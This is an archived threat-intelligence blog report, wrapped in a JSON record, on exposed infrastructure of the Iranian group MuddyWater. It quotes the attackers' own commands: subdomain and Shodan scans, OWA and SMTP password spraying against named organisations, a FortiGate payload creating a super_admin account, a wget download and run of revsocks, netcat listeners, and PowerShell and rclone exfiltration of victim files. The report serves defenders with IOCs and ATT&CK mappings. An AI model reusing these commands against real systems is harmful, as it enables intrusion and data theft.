{
	"id": "c263467f-c4c1-46b8-852c-fc909ac90f0f",
	"created_at": "2026-04-06T00:13:13.620466Z",
	"updated_at": "2026-04-10T03:34:22.65587Z",
	"deleted_at": null,
	"sha1_hash": "580f97ddec2872f618306b86bddd4896bd56fe2f",
	"title": "MuddyWater Exposed: Inside an Iranian APT operation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 817945,
	"plain_text": "MuddyWater Exposed: Inside an Iranian APT operation\r\nBy Ctrl-Alt-Intel\r\nPublished: 2026-03-04 · Archived: 2026-04-05 20:48:43 UTC\r\nOverview\r\nCtrl-Alt-Intel researchers went hunting for exposed Iranian APT infrastructure. We identified and dumped C2 tooling, scripts, logs, victim data, and other operational artefacts from a VPS hosted in the Netherlands. Ctrl-Alt-Intel assesses with high confidence that this server is operated by MuddyWater (also tracked as Static Kitten, Mango Sandstorm, Earth Vetala, Seedworm, TA450), a cyber espionage group attributed as a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS).\r\nRepeated operational security failures by the operators allowed our researchers to pivot using Hunt.io to identify additional infrastructure that we also attribute to MuddyWater.\r\nThis blog details the reconnaissance, initial access, command and control, and post-exploitation tradecraft observed - including 3+ developed C2s, a Tsundere Botnet using Ethereum smart contracts, and the targeting of organisations across Israel, Jordan, Egypt, the UAE, Portugal, and the United States.\r\nCtrl-Alt-Intel is not politically affiliated and does not conduct research in support of any government, ideology, or political agenda. The findings presented here are the result of independent threat intelligence research and are shared openly with the security community to help defenders identify, detect, and mitigate threats.\r\nRecon\r\nMuddyWater was observed leveraging Shodan and Nuclei to identify potentially vulnerable targets.
Additionally, subfinder and ffuf were leveraged to perform enumeration of target web applications:\r\nSubfinder / ffuf\r\nsubfinder -d clearview.ai -o out-clearview..txt\r\nsubfinder -d jewishagency[.]org -all\r\nsubfinder -d salampalestine[.]org -all\r\nsubfinder -d nbn.org[.]il -all\r\nsubfinder -d yahelisrael[.]com -all\r\nsubfinder -d terrogence[.]com -all\r\nffuf -u https://www.zivorex.com/FUZZ -w directory-list-lowercase-2.3-medium.txt -e .json,.txt,.zip,.rar\r\nClearview AI - US facial recognition software\r\nJewish Agency - Global Jewish community programs (nonprofit/NGO).\r\nSalam Palestine - Volunteer, internship, Arabic-learning, and community/cultural programs in Palestine.\r\nNefesh B’Nefesh (nbn.org[.]il) - Nonprofit / immigration (Aliyah) facilitation \u0026 integration services.\r\nYahel Israel - Volunteer/service-learning programs and community partnership programs in Israel.\r\nTerrogence - Israeli-owned private intelligence-as-a-service firm\r\nZivorex - UAE-based online platform for selling gold/silver\r\nCustom Subdomain Reconnaissance Pipeline\r\nMuddyWater also operates a significantly more mature reconnaissance pipeline using the script just-sub-v5.py. The automated recon chains three subdomain enumeration tools together:\r\n1. Sudomy (run via Docker)\r\n2. Subfinder\r\n3. OneForAll\r\nResults are merged, deduplicated, and validated with dnsx to confirm live DNS resolution.
The tool supports a two-layer approach: first enumerate subdomains of the target, then enumerate subdomains of those subdomains, effectively performing recursive subdomain discovery.\r\nShodan CLI\r\nThe threat actor used the command shodan init to authenticate with the API key, before running shodan download with two queries:\r\nshodan download --limit -1 --fields ip_str,port ivanti-1 \"title:'Ivanti User Portal: Sign In'\"\r\nshodan download --limit -1 --fields ip_str,port ivanti-2 'http.favicon.hash:1983356674'\r\nBoth of these queries were used to identify Ivanti devices on the internet. MuddyWater additionally scanned using Nuclei to identify targets vulnerable to Ivanti CVE-2026-1281:\r\nNuclei\r\nnuclei -l outputIPandport1983356674.txt -t nuclei-templates/http/cves/2026/CVE-2026-1281.yaml -o epmmoutput_fo_\r\nnuclei -l outputIPandport362091310.txt -t nuclei-templates/http/cves/2026/CVE-2026-1281.yaml -o epmmoutput_362_f\r\nInitial Access\r\nKnown vulnerabilities\r\nMuddyWater attempted to scan and/or exploit the below CVEs:\r\nCVE-2026-1731 - BeyondTrust RCE\r\nCVE-2026-1281 - Ivanti Endpoint Manager Mobile (EPMM) code injection\r\nCVE-2025-68613 - n8n expression authenticated RCE\r\nCVE-2025-55182 - React2Shell\r\nCVE-2025-52691 - SmarterTools SmarterMail unrestricted file upload\r\nCVE-2025-54068 - Laravel Livewire RCE\r\nCVE-2025-9316 - N-Central improper access control\r\nCVE-2025-5777 - Citrix NetScaler memory leak\r\nCVE-2025-34291 - Langflow chained account takeover + RCE\r\nCVE-2024-55591 - Fortinet FortiOS authentication bypass\r\nCVE-2024-23113 - Fortinet FortiOS RCE\r\nCVE-2022-42475 - Fortinet FortiOS RCE\r\nNovel vulnerabilities\r\nMuddyWater identified and exploited novel SQL injection vulnerabilities in two websites:\r\nBaSalam - A popular Iranian online/social marketplace\r\nA Postgres development
platform\r\nInterestingly, the compromise of an Iranian marketplace by MuddyWater is a stark reminder that the Iranian regime is willing to attack its own businesses and people.\r\nAdditionally, MuddyWater has targeted a subdomain of a company that runs a “Postgres development platform”. Based on the results of their dump, no significant data was taken.\r\nBruteforce / Spraying\r\nAside from exploiting vulnerabilities, MuddyWater has attempted to password spray Outlook Web Access (OWA) \u0026 SMTP services.\r\npython owa.py -u users.txt -p morepasswd.txt -f url.txt -m bf -t 10 # Linked to https://webmail.gov.jo\r\npython owa.py -f mail.[REDACTED] -u owausernames.txt -p pass.txt -o out.txt -m bf -t 1\r\npython3 owa.py --url https://gohost.co[.]il/owa/auth/logon.aspx --username user.txt --password pass.txt --thread\r\npython3 owa.py --url https://84.110.105[.]214 --username users.txt --password pass.txt --threads 30 --output suc\r\n #https://mail.bethadar.com\r\npython3 owa.py --url https://mail.terem[.]com --username user.txt --password pass.txt --threads 5 --output succe\r\nJordan Government Webmail\r\nUAE based: provider of marine dredging, energy EPC (Engineering, Procurement, and Construction)\r\nHost \u0026 Found (gohost.co[.]il): Israeli Managed IT / hosting provider\r\nBet Hadar: Israeli Medical rehabilitation and nursing center\r\nTerem: Israeli urgent-care / walk-in medical clinic network\r\nFurthermore, we also saw the tool patator used in an attempt to brute-force SMTP:\r\npatator smtp_login host=mail.REDACTED[.]com port=587 starttls=1 user=FILE0 password=FILE1 0=admins.txt 1=pass.t\r\npatator smtp_login host=mail.REDACTED[.]com port=587 starttls=1 user=FILE0 password=FILE1 0=admins.txt 1=pass.tx\r\nFortigate Exploitation\r\nWe observed the threat actor target multiple Fortinet-related CVEs (CVE-2024-55591, CVE-2024-23113 \u0026
CVE-2022-42475) in attempts to gain command execution on edge devices.\r\nWe observed the threat actor had modified the watchTowr CVE-2024-55591 PoC that would allow for RCE. The original watchTowr PoC sends an operator-supplied command (for example, get system status) after forging the WebSocket login context. In the modified sample, this was replaced with hardcoded FortiOS CLI configuration payloads (test1 – test13) focused on account creation, privilege escalation and persistence.\r\nMultiple embedded payloads attempt to create or modify local users and VPN groups (for example FortiWiFi, darlen, offices, and VPN-Users / ssl-vpn-groupamoss). Other commands (show, list, ?) suggest hands-on testing of FortiOS CLI syntax during operations.\r\nThe payload actively executed in the sample (test11) attempts to create a new FortiGate administrator account, FortiSetup, with the super_admin profile and root VDOM. The password is supplied as a FortiOS ENC value rather than plaintext, consistent with an attempt to establish persistence:\r\nconfig system admin\r\n    edit \"FortiSetup\"\r\n        set accprofile \"super_admin\"\r\n        set vdom \"root\"\r\n        set password ENC SH2x6nU4ztieZPUfFQpYaZY99xC3x4+7RFlL7+pkVYA/sW6Dd53lNOCATA3vbs=\r\n    next\r\nend\r\nThe forged login context was also modified to include a different public IP (194.11.246[.]101:1338) instead of the public PoC placeholder, providing an additional operational artefact.\r\n# Original\r\nlogin_message = f'\"{args.user}\" \"admin\" \"watchTowr\" \"super_admin\" \"watchTowr\" \"watchTowr\" [13.37.13.37]:1337 [13\r\n# MuddyWater version:\r\nlogin_message = f'\"{args.user}\" \"admin\" \"watchTowr\" \"super_admin\" \"watchTowr\" \"watchTowr\" [194.11.246.101]:1338\r\nI don’t believe the provided IP address has an impact on exploitation, however MuddyWater still modified the script to change the IP
address to 194.11.246[.]101. Notably, this IP address is known MuddyWater infrastructure, previously reported by the security vendor ESET in a December 2025 analysis - MuddyWater: Snakes by the riverbank. In ESET’s blog, this IP address was noted as a “MuddyWater C\u0026C server” - with no mention of Fortinet exploitation.\r\nCtrl-Alt-Intel identified one victim associated with this attack, an Israeli distributor of scientific equipment and quality control instruments.\r\nN-Central exploitation\r\nMuddyWater also performed mass-exploitation of CVE-2025-9316, a vulnerability in SolarWinds N-central, a widely deployed RMM (Remote Monitoring \u0026 Management) platform used by MSPs. This could allow MuddyWater to generate session IDs for unauthenticated users:\r\n[Figure: CVE-2025-9316 exploitation]\r\nCommand \u0026 Control\r\nCtrl-Alt-Intel managed to retrieve multiple C2 server binaries, alongside some corresponding clients, that were used by MuddyWater.\r\nSome of the C2 components had previously been discussed by Group-IB in their analysis: Operation Olalampo: Inside MuddyWater’s Latest Campaign.\r\nOn the MuddyWater server identified by Ctrl-Alt-Intel, a subdirectory (/rdp/c2 rdp) contained three files:\r\nclient.exe - C2 client\r\nserver - C2 server binary\r\nserver.txt - Credentials \u0026 IP address of C2 server\r\nNotably, within server.txt the IP address 162.0.230[.]185 was exposed:\r\n[Figure: MuddyWater C2 server]\r\nThis IP was included within the Group-IB reporting, alongside a splash page displaying “We’ll Be Back Soon” on a MuddyWater-linked IP address (209.74.87[.]67) and on the separate domain netvigil[.]org.\r\nWe observed this identical HTML page served on the exposed infrastructure:\r\n[Figure: MuddyWater HTML splash page]\r\nC2 server binaries have been uploaded to our
Github.\r\nAlthough an analysis of all the server-side C2 binaries is not in the scope of this blog, we did run these ourselves to take a look at how the operators would control victim machines:\r\n[Figure: MuddyWater C2 server]\r\nKeyC2\r\nMuddyWater used a Python-based C2 server over UDP, named Key C2. This allows operators to remotely control compromised Windows machines over a custom binary protocol on port 1269 from a single Python script.\r\n[Figure: KeyC2 Python source]\r\nWhen a client first beacons in, it transmits system information including the computer name, domain, Windows version, and username. The server parses this, assigns the client a numeric ID, and stores it in a local SQLite database. Clients then periodically check in, allowing the operator to see which machines are online.\r\nOnce an operator selects a client, Key C2 supports the following capabilities:\r\nRemote command execution - two modes (cmd and cmdexec) for executing commands on the victim and streaming output back\r\nFile download - pull files from the compromised machine to the C2 server\r\nFile upload - push files from the C2 server to the victim\r\nC2 server migration - instruct a client to redirect its beaconing to a different IP address, allowing the operator to move infrastructure without losing access\r\nCtrl-Alt-Intel observed emojis in the command output, indicative of AI-assisted development.
The source has been uploaded to our Github.\r\nPersianC2\r\nCtrl-Alt-Intel identified an additional, more mature C2 server used by MuddyWater which we have coined PersianC2, named after Persian/Farsi strings that were found in the source:\r\n[Figure: Persian strings]\r\nUnlike Key C2’s custom UDP protocol and CLI interface, PersianC2 used standard HTTP polling. Implants beacon into the server on a configurable sleep interval, picking up queued commands via JSON API endpoints.\r\nThe operator dashboard supports:\r\nRemote command execution - commands are queued and picked up on the next heartbeat, with output streamed back to the dashboard in real-time\r\nFile upload - push files from the C2 to victims, with live progress tracking and cancel support\r\nSleep configuration - adjust the implant’s beacon interval per-client\r\nStaging - a built-in mechanism that takes a template binary (calc.exe), appends a SHA-256 hash derived from the victim’s username and computer name, and drops the payload to the victim\r\nClient removal - queue an exit!!
command that triggers the implant to self-terminate and deletes the database record\r\nThe PersianC2 source code has been uploaded to our Github.\r\nC2 logging\r\nIn the PersianC2 directory we observed the files client.db and .command_history, alongside the directories uploads \u0026 downloads.\r\nAlthough only one victim was observed beaconing from a Portuguese IP address, we could see MuddyWater operators attempting to run commands on the 23rd February:\r\n# 2026-02-23 18:53:26.546078\r\n+upload db.msi dd2.msi\r\n# 2026-02-23 18:56:24.620743\r\n+upload db.msi dd11.msi\r\n# 2026-02-23 19:14:18.041428\r\n+list\r\n# 2026-02-23 19:15:43.499677\r\n+upload cal.exe c22.exe\r\n# 2026-02-23 19:20:00.789845\r\n+cmd ping 8.8.8.8 -n 3\r\nArenaC2\r\nCtrl-Alt-Intel identified an additional Python-based C2 framework on the MuddyWater server, which we have coined ArenaC2.\r\nUnlike Key C2’s custom UDP protocol or PersianC2’s JSON API polling, ArenaC2 operates over HTTP POST using a FastAPI/uvicorn web server and encrypts all traffic with AES-256-CBC.\r\nThe C2 server presents a decoy landing page masquerading as “ArenaReport”, a fictitious multilingual news website, when visited via a browser.
This page includes embedded images, animated backgrounds, and content in English, French, and German - designed to make the C2 domain appear as a legitimate website to casual visitors or automated scanners.\r\nEndpoint | Method | Purpose\r\n/ | GET | Decoy HTML landing page (“ArenaReport”)\r\n/redirect | POST | Stager - delivers the implant executable to new victims\r\n/sort | POST | Registration - implant checks in with host reconnaissance, receives session ID and auth token\r\n/deliver | POST | Tasking - implant polls for queued commands\r\n/deliver/0 | POST | Connection check result\r\n/deliver/1 | POST | Shell creation result\r\n/deliver/2 | POST | Command execution acknowledgement\r\n/deliver/3 | POST | Shell output (streamed back to operator)\r\n/deliver/4 | POST | Upload initiation acknowledgement\r\n/deliver/5 | POST | Upload chunk acknowledgement\r\n/deliver/6 | POST | Secondary payload delivery (ConsoleApplicationen.exe)\r\nThe file ConsoleApplicationen.exe identified on disk was not an executable, as the name would suggest. Ctrl-Alt-Intel has not analysed this further - but would encourage those who are interested to access this via our Github.\r\nProxy / Tunneling\r\nMuddyWater was observed leveraging the Chinese-developed tool Neo-reGeorg to perform webshell-based SOCKS pivoting.\r\npython3 neoreg.py -k 123QWEasd -u https://[REDACTED]/aspnet_client/system_web/4_0_30319/nfud.aspx\r\nMuddyWater compromised the Exchange server of a Portuguese immigration government-related domain, uploading a Neo-reGeorg web-shell to facilitate access to the internal network.\r\nAdditionally, the tool resocks was used to configure SOCKS listeners multiple times:\r\n./resocks listen --on 0.0.0.0:443 ...
-p 0.0.0.0:10843\r\nSimilarly, an alternative tool, revsocks, was also used by the threat actor to gain access to internal victim networks:\r\nwget -O rev https://github.com/kost/revsocks/releases/download/v2.9/revsocks_linux_amd64\r\nchmod a+x rev\r\n./rev\r\n./rev -listen :443 -socks 0.0.0.0:1080 -pass SuperSecretPassword -ws\r\nnc -lvp 443\r\n./rev -listen :443 -socks 0.0.0.0:1080 -pass SuperSecretPassword -ws\r\nTsundere EtherHiding\r\nWithin the server, we identified that MuddyWater had staged a PowerShell loader, reset.ps1. The PowerShell loader leads to execution of obfuscated Node.js payloads that appear similar to Tsundere Botnet.\r\nThe loader downloads the Node.js interpreter to the following file path:\r\n%USERPROFILE%\\AppData\\Local\\Nodejs\\\r\nEmbedded within the PowerShell loader are AES-CBC/PKCS7 encrypted blobs, which are decrypted and written to disk:\r\n%USERPROFILE%\\AppData\\Local\\Nodejs\\VfZUSQi6oerKau.js\r\n%USERPROFILE%\\AppData\\Local\\Nodejs\\sysuu2etiprun.js\r\nAdditionally, a package.json file is also written to disk, revealing the Node.js packages the payload would leverage:\r\n{\r\n  \"name\": \"system-service\",\r\n  \"version\": \"1.0.0\",\r\n  \"description\": \"System service setup\",\r\n  \"dependencies\": {\r\n    \"ws\": \"^8.18.1\",\r\n    \"ethers\": \"^6.13.2\"\r\n  }\r\n}\r\nThe Node.js script VfZUSQi6oerKau.js is used to establish persistence via the creation of a Run key. This script will also trigger execution of the main bot, sysuu2etiprun.js.\r\nThis sample uses Ethereum smart contracts in order to retrieve the C2 servers.
By deobfuscating the sample, we retrieved the following details:\r\nContract - 0x2B77671cfEE4907776a95abbb9681eee598c102E\r\nABI func - getString()\r\nQuery arg - 0x002E9Eb388CBd72bad2e1409306af719D0DB15e4\r\nWe also observed a hardcoded list of Ethereum RPC nodes that would be used to call the getString() function on the smart contract.\r\nBlockchain hosting C2 servers\r\nUsing Etherscan we can view the contract’s event log history, revealing lists of C2 servers:\r\n[Figure: EtherScan Smart Contract History]\r\nThis bot communicates over WebSocket to retrieve commands. Two historical IP addresses were observed serving as WebSocket C2 servers:\r\n185.236.25[.]119\r\n193.17.183[.]126\r\nExfiltration\r\nAlthough we observed MuddyWater use multiple custom-developed C2s, many of which had capabilities for exfiltration, we also observed the threat actor leveraging Wasabi S3, put.io, Amazon EC2 and, separately, a lightweight Python HTTP file server on the machine.\r\nPython-server\r\nA minimal Flask web application (web.py) was found serving as a file exfiltration receiver.
It runs on port 10443 and accepts file uploads via a POST to /success:\r\n@app.route('/success', methods = ['POST'])\r\ndef success():\r\n    if request.method == 'POST':\r\n        f = request.files['file']\r\n        f.save(f.filename)\r\nA commented-out PowerShell one-liner demonstrates the intended client-side usage:\r\n$wc = New-Object System.Net.WebClient\r\n$resp = $wc.UploadFile(\"http://127.0.0.1:5000/success\",\"C:\\Users\\K3vin\\Downloads\\log.txt\")\r\nCtrl-Alt-Intel observed MuddyWater run the below PowerShell commands in an attempt to exfiltrate data from victim machines:\r\ncd E:\\DATA\\PEACE2\\Personnel_Share\\CreditCards\\Amex\\;foreach ($name in ((ls).Name)){$wc = New-Object System.Net\r\nGet-ChildItem -Path \"C:\\Users\\riyad\\desktop\" -Recurse -File | ForEach-Object {$wc = New-Object System.Net.WebCli\r\nIt appears MuddyWater is also operating an EC2 server used for exfiltration on the IP address 18.223.24[.]218.\r\nEgyptAir\r\nThe Python HTTP exfiltration server was primarily used to steal data from EgyptAir or visas/passports of Egyptian nationals. This data included, but was not limited to:\r\nEgyptian passport and visa information\r\nReceipts from “King Khalid Int’l Airport” in Riyadh\r\nLegal documents\r\nFinancial statements\r\nPhotos and videos from WhatsApp\r\nAlthough the files were predominantly related to EgyptAir, the PowerShell command exposing the file path C:\\Users\\riyad\\desktop, along with the receipt from “King Khalid Int’l Airport,” may suggest that this specific data was stolen from a computer associated with EgyptAir located in Riyadh, Saudi Arabia.\r\nMore notably, in the same exfiltration directory, the threat actor had also stolen multiple scripts and binaries related to ZKTeco’s biometric time-and-attendance and physical access control systems.\r\nAlthough this could be coincidental, we noted that the exfiltrated
ZKTeco biometric access control software and configurations may align with MuddyWater’s previous targeting of the U.S. company Clearview AI, a facial recognition provider.\r\nCloud Storage\r\nMuddyWater was also observed leveraging both Wasabi S3 and put.io for exfiltrating stolen files. It appears MuddyWater attempted to back up files from the S3 bucket to put.io using the rclone tool:\r\nrclone config reconnect putio:\r\nrclone lsd putio:\r\nrclone lsd wasbbi:\r\nrclone lsd wasabbi:\r\nrclone lsd wasabbi:wasabirclone\r\nrclone copy wasabbi:wasabirclone/ERPBackup putio:/iiitdEDUin\r\nPivoting (with Hunt.io)\r\nIn the Command \u0026 Control section, Ctrl-Alt-Intel researchers identified a C2 IP address, 162.0.230[.]185, that had already been linked to MuddyWater by Group-IB.\r\nPivoting on this IP address on the threat intelligence platform Hunt.io, we can see they have previously caught another associated open-directory:\r\n[Figure: Additional MuddyWater open-directories]\r\nWithin this open-directory, we observed the payload second.exe:\r\n[Figure: Pivoting on known MuddyWater malware]\r\nWe can use the “Search by SHA256” feature to pivot and identify another open-directory on the domain www.xt24[.]com:\r\n[Figure: Pivoting on known MuddyWater malware]\r\nAttribution Assessment\r\nCtrl-Alt-Intel assesses with high confidence that this infrastructure is operated by MuddyWater (also tracked as Static Kitten, Mango Sandstorm, TEMP.Zagros, Earth Vetala, Seedworm or TA450), a cyber espionage group attributed as a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS).\r\nThis assessment is based on the convergence of victimology, tooling overlaps with published MuddyWater research, linguistic artefacts, and infrastructure overlaps.\r\nSupporting
Evidence\r\nExpected victimology - Targets span Israeli organisations (healthcare, hosting, immigration, intelligence), an Egyptian airline, Jordanian government webmail, UAE companies, US entities, and Jewish/Israeli-linked NGOs - all consistent with known MOIS collection priorities. The compromise of the Iranian marketplace BaSalam further aligns with MOIS’s documented domestic surveillance mandate.\r\nDirect overlap with Group-IB’s Operation Olalampo - In February 2026, Group-IB published research attributing Operation Olalampo to MuddyWater. We retrieved C2 components, infrastructure, malware and tools previously discussed in that analysis, and observed an identical “We’ll Be Back Soon” splash page served on both our identified infrastructure and MuddyWater-linked IP addresses referenced in their reporting.\r\nInfrastructure overlap with ESET reporting - The IP address 194.11.246[.]101, embedded within MuddyWater’s modified Fortinet exploit, was previously identified by ESET in their December 2025 analysis MuddyWater: Snakes by the riverbank as a MuddyWater C\u0026C server.\r\nPersian/Farsi language artefacts - Persian/Farsi strings were identified within .bash_history, commented source code, and the C2 framework we coined PersianC2. This is consistent with the profile of Iranian operators.\r\nExploitation of edge devices - Exploitation of multiple Fortinet CVEs aligns with a 2021 CISA/FBI joint advisory documenting Iranian state-sponsored actors exploiting Fortinet vulnerabilities since at least March 2021.
Similarly, this actor targeted Exchange servers and deployed webshells to Portuguese government infrastructure, consistent with MuddyWater’s well-documented history of exploiting Microsoft Exchange for initial access, as highlighted in the same CISA advisories.\r\nConclusion\r\nThe exposed infrastructure detailed in this blog provides a broad view into a MuddyWater operation - from initial reconnaissance through to data exfiltration. What stands out is not the sophistication of any single tool or malware, but the breadth of the operation: countless organisations targeted, multiple custom-developed C2 frameworks, exploitation of over a dozen CVEs including novel SQL injection vulnerabilities, password spraying campaigns, Ethereum-based C2 resolution, and multiple exfiltration channels spanning cloud storage \u0026 EC2 instances.\r\nMuddyWater continues to demonstrate a willingness to rapidly adopt public exploit code, modify it for operational use, and deploy it at scale - all while developing custom tooling in parallel. The targeting observed here - spanning Israeli healthcare and immigration organisations, Jordanian government webmail, an Egyptian national airline, UAE enterprises, and even an Iranian domestic marketplace - reinforces that MOIS collection priorities remain broad, aggressive, and unconstrained by national borders, including their own.\r\nPerhaps most notable are the repeated operational security failures that enabled this research: exposed open-directories, hardcoded credentials, reused infrastructure across campaigns, and server-side source code left accessible.\r\nCtrl-Alt-Intel will continue to monitor MuddyWater infrastructure and will publish updates as new findings emerge.
Defenders are encouraged to review the IOCs and MITRE ATT\u0026CK mappings provided below.\r\nAcknowledgements\r\nFirstly, we would like to thank Security Researcher @ice_wzl_cyber for his collaboration, insight and analysis into this MuddyWater campaign.\r\nWhilst writing this blog, Security Researcher @nahamike01 also observed KeyC2 \u0026 Tsundere Botnet activity linked to MuddyWater campaigns:\r\n[Figure: @nahamike01 Tweet]\r\nHuntress\r\nOn 06/03/26, Huntress released a blog, Clearing the Water: Unmasking an Attack Chain of MuddyWater, exposing the kill-chain from an Iranian APT intrusion that they contained.\r\n[Figure: Huntress blog]\r\nIt was interesting to see the same indicator that inspired this blog used in the wild. Additionally, further overlaps in indicators were observed with Group-IB \u0026 Hunt.io.
We wanted to acknowledge the work by Jamie Levy \u0026 Harlan Carvey breaking down MuddyWater tradecraft seen in-the-wild.\r\nIOCs\r\nIndicator | Type | Context\r\n185.236.25[.]119 | IP Address | Tsundere Bot WebSocket C2\r\n193.17.183[.]126 | IP Address | Tsundere Bot WebSocket C2\r\n162.0.230[.]185 | IP Address | MuddyWater C2 / Open Directory\r\n157.20.182[.]49 | IP Address | Open Directory\r\n209.74.87[.]100 | IP Address | Open Directory\r\n18.223.24[.]218 | IP Address | Exfiltration Server\r\n194.11.246[.]101 | IP Address | Fortigate POC IP\r\nwww.xt24[.]com | Domain | Open Directory\r\nreset.ps1 | Filename | Tsundere Bot PowerShell loader\r\n0x2B77671cfEE4907776a95abbb9681eee598c102E | Address | Smart Contract Address\r\n7ab597ff0b1a5e6916cad1662b49f58231867a1d4fa91a4edf7ecb73c3ec7fe6 | SHA-256 | reset.ps1 - Tsundere Bot PowerShell loader\r\nVfZUSQi6oerKau.js | Filename | Tsundere Bot persistence / launcher script\r\nc8589ca999526f247db4d3902ade8a85619f8f82338c6230d1b935f413ddcb3d | SHA-256 | VfZUSQi6oerKau.js\r\nsysuu2etiprun.js | Filename | Tsundere Bot main payload\r\nbedb882c6e2cf896e14ecf12c90aaa6638f780017d1b8687a40b4a81956e230f | SHA-256 | sysuu2etiprun.js\r\nMITRE ATT\u0026CK\r\nTactic | ID | Technique | Observation\r\nReconnaissance | T1595.002 | Active Scanning: Vulnerability Scanning | Nuclei used to mass-scan for CVEs\r\nReconnaissance | T1590.002 | Gather Victim Network Information: DNS | subfinder used for subdomain enumeration of target organisations\r\nReconnaissance | T1595.003 | Active Scanning: Wordlist Scanning | ffuf directory brute-forcing against target web applications\r\nResource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server | Multiple VPS used to host C2 tooling and operational scripts\r\nResource Development | T1587.001 | Develop Capabilities: Malware | Custom C2 frameworks developed: Key C2 (UDP) and PersianC2 (HTTP)\r\nResource Development | T1588.005 | Obtain Capabilities: Exploits | Public exploit code and Nuclei templates for multiple CVEs\r\nResource Development | T1588.002 | Obtain Capabilities: Tool | Open-source tools: Neo-reGeorg, resocks, revsocks, patator\r\nInitial Access | T1190 | Exploit Public-Facing Application | Exploitation of Fortinet, Ivanti, Exchange, BeyondTrust, and novel SQLi\r\nInitial Access | T1110.003 | Brute Force: Password Spraying | OWA password spraying against Israeli, Jordanian, and UAE targets\r\nInitial Access | T1110.001 | Brute Force: Password Guessing | patator SMTP brute-force against mail servers\r\nDiscovery | T1082 | System Information Discovery | ArenaC2, KeyC2, and PersianC2 all collect OS version, architecture, VM status, and domain membership at check-in\r\nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | reset.ps1 - Tsundere Bot PowerShell loader decrypts and stages Node.js payloads\r\nExecution | T1059.007 | Command and Scripting Interpreter: JavaScript | Obfuscated Node.js payloads (VfZUSQi6oerKau.js, sysuu2etiprun.js)\r\nExecution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Key C2 cmd and cmdexec modes for remote command execution\r\nPersistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys | VfZUSQi6oerKau.js creates a Run key for persistence\r\nPersistence | T1505.003 | Server Software Component: Web Shell | Neo-reGeorg ASPX webshell (nfud.aspx) deployed on compromised Exchange server\r\nPersistence | T1136.001 | Create Account: Local Account | FortiGate exploitation creates FortiSetup admin account with super_admin profile\r\nDefense Evasion | T1027 | Obfuscated Files or Information | Obfuscated Node.js payloads within Tsundere Bot\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | Encrypted blobs decrypted at runtime by reset.ps1\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols | PersianC2 HTTP polling; Tsundere Bot WebSocket C2\r\nCommand and Control | T1095 | Non-Application Layer Protocol | Key C2 custom binary protocol over UDP port 1269\r\nCommand and Control | T1102.001 | Web Service: Dead Drop Resolver | Ethereum smart contract used to resolve C2 server IP addresses\r\nCommand and Control | T1571 | Non-Standard Port | Key C2 operating on UDP port 1269\r\nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | ArenaC2 encrypts all C2 traffic with AES-256-CBC using hardcoded keys\r\nCommand and Control | T1090.002 | Proxy: External Proxy | resocks and revsocks SOCKS proxy listeners for tunnelling into victim networks\r\nExfiltration | T1041 | Exfiltration Over C2 Channel | Key C2 and PersianC2 both support file download from victims\r\nExfiltration | T1567 | Exfiltration Over Web Service | Stolen data exfiltrated to Wasabi S3 and put.io cloud storage via rclone\r\nExfiltration | T1048 | Exfiltration Over Alternative Protocol | Flask-based HTTP file receiver (web.py) on port 10443 and Amazon EC2 instance used for bulk file exfiltration outside C2 channel\r\nCollection | T1005 | Data from Local System | SQL injection data exfiltration; file retrieval via C2\r\nSource: https://ctrlaltintel.com/threat%20research/MuddyWater/#python-server",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://ctrlaltintel.com/threat%20research/MuddyWater/#python-server"
	],
	"report_names": [
		"#python-server"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
